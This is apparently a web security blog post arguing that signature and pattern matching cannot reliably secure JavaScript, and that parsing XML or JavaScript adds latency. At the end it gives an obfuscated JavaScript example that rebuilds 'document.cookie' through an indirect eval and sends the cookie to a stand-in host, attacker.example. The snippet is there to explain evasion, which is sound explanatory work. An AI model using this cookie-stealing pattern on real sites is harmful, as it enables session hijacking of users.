Pattern matching and regular expressions provide minimal value for securing client-side interpreted languages, at best, because of the incredibly high number of possible combinations of putting together code. As we learned from preventing SQL injection and XSS, attackers are easily able to avoid detection by these systems by simply adding white space, removing white space, using encoding tricks, and just generally finding a new permutation of their code.

Parsing is, of course, the best answer. As 7rans noted yesterday regarding the Billion More Laughs JavaScript hack, if you control the stack, you control the execution of the code. Similarly, if you parse the data you can get it into a format more akin to that of a compiled language, and then you can secure it. That's the reasoning behind XML threat defense, or XML firewalls. In fact, all SOA and XML security devices necessarily parse the XML they are protecting - because that's the only way to know whether or not some typical XML attacks, like the Billion Laughs attack, are present.

But this implementation comes at a price: performance. Parsing XML is compute intensive, and it necessarily adds latency. Every device you add into the delivery path that must parse the XML to route it, secure it, or transform it adds latency and increases response time, which decreases overall application performance. This is one of the primary reasons most XML-focused solutions prefer to use a streaming parser. Streaming parser performance is much better than a full DOM parser, and still provides the opportunity to validate the XML and find malicious code. It isn't a panacea, however, as there are still some situations where streaming can't be used - primarily when transformation is involved.

We know this already, and also know that JavaScript and client-side interpreted languages in general are far more prolific than XML. Parsing JavaScript externally to determine whether it contains malicious code would certainly make it more secure, but it would also likely severely impact application performance - and not in a good way.
We also know that streaming JavaScript isn't a solution, because unlike an XML document, JavaScript is not confined. JavaScript is delimited, certainly, but it isn't confined to just being in the HEAD of an HTML document. It can be anywhere in the document, and often is. Worse, JavaScript can self-modify at run-time - and often does (see the sketch at the end of this post). That means the security threat may not be in the syntax or the code when it's delivered to the client, but may appear only once the script is executed. Not only would an intermediate security device need to parse the JavaScript, it would need to execute it in order to properly secure it.

While almost all web application security solutions - ours included - are capable of finding specific attacks like XSS and SQL injection that are hidden within JavaScript, none are able to detect and prevent JavaScript code-based exploits unless they can be identified by a specific signature or pattern. And as we've just established, that's no guarantee the exploits won't morph and change as soon as they can be prevented.

That's why browser add-ons like NoScript are so popular. Because JavaScript security today is binary: allow or deny. Period. There's no real in between. There is no JavaScript proxy that parses and rejects malicious script, no solution that proactively scans JavaScript for code-based exploits, no external answer to the problem. That means we have to rely on the browser developers not only to write a good browser with all the bells and whistles we like, but to provide security as well.

I am not aware of any security solution that currently parses out JavaScript before it's delivered to the client. If there are any out there, I'd love to hear about them.
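To illustrate the run-time problem mentioned above, here is a tiny example of the kind of payload a signature- or pattern-based device struggles with (the exfiltration host is hypothetical):

// None of the strings a signature would look for ("<script>", "document.cookie",
// "eval(") appear literally, yet the code reconstructs them when it executes
var parts = ['docu', 'ment.c', 'ookie'];
var stolen = window['ev' + 'al'](parts.join(''));                           // indirect eval -> document.cookie
new Image().src = '//attacker.example/?c=' + encodeURIComponent(stolen);   // attacker.example is hypothetical

Only by executing the script does the cookie-stealing behavior become visible, which is exactly the dilemma described above.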